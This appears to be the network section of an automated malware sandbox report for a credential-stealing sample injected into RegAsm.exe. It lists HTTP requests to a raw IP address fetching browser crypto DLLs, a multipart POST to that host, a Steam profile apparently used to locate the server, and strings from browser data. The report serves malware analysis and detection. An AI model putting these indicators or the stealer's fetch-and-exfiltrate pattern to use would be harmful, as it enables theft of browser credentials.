              Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
              Source: RegAsm.exe, 00000002.00000002.2472411920.000000001921D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.drString found in binary or memory: http://www.sqlite.org/copyright.html.
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: 76561199689717899[1].htm.2.drString found in binary or memory: https://78.47.123.174
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/freebl3.dll
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/mozglue.dll
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/msvcp140.dll
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/nss3.dll
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/softokn3.dll
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467689392.0000000000EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/sqls.dll
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/sqls.dllb
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467689392.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/vcruntime140.dll
              Source: RegAsm.exe, 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174;
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174DBKE
              Source: RegAsm.exe, 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174HCAF
              Source: HCFIJK.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: 76561199689717899[1].htm.2.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: RegAsm.exe, 00000002.00000002.2467689392.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, FIEHII.2.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: RegAsm.exe, 00000002.00000002.2467689392.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, FIEHII.2.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: HCFIJK.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: HCFIJK.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: HCFIJK.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
              Source: 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
              Source: RegAsm.exe, 00000002.00000002.2467689392.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, FIEHII.2.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: RegAsm.exe, 00000002.00000002.2467689392.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, FIEHII.2.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: HCFIJK.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: HCFIJK.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: HCFIJK.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://help.steampowered.com/en/
              Source: FIEHII.2.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://mozilla.org0/
              Source: 76561199689717899[1].htm.2.drString found in binary or memory: https://steamcommunity.com/
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://steamcommunity.com/discussions/
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/ho
              Source: 76561199689717899[1].htm.2.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/m
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://steamcommunity.com/market/
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: file.exe, 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2467689392.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://steamcommunity.com/workshop/
              Source: 76561199689717899[1].htm.2.drString found in binary or memory: https://store.steampowered.com/
              Source: 76561199689717899[1].htm.2.drString found in binary or memory: https://store.steampowered.com/about/
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://store.steampowered.com/explore/
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://store.steampowered.com/legal/
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://store.steampowered.com/mobile
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://store.steampowered.com/news/
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://store.steampowered.com/stats/
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
